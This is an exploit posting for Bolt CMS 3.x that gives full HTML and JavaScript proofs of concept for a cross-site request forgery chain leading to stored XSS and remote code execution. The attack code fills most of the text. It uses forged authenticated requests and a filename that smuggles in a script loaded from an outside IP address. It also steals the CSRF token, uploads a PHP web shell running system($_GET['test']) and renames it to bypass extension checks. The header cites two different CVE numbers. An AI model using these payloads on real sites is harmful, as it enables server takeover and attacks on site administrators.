Bolt CMS 3.6.10 – Cross-Site Request Forgery
# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : CVE-2019-1759
# last version
# Csrf p0c
<html>
<body>
<head>
Bolt v 3.x exploit 0day
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
<script>
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "parent=&foldername=sss&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
};
JSfuck1();
}
}
JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
}
};
where();
}
where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);
}
Csrf();
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
JS p0c
<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/index.php\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
};
xhr.send();
}
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload« ______ »[]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
"\r\n" +
token
"-----------------------------190530466613268610451083392867--\r\n";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}
bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}
bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);
}
Token();
</script>
version 6.5
CSrf p0c
<html>
<body>
<head>
Bolt v 3.x CVE-2019-17591 exploit
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
<script>
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "filename=test&parentPath=&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
JSfuck();
}
};
}
JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'
onerror=alert(1)>";
xhr.send(body1);
}
Csrf();
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
Js p0c
<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
}
xhr.send(null);
}
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload« ______ »[]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
"\r\n" +
token
"-----------------------------190530466613268610451083392867--\r\n";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();
</script>
proof of concept :
https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends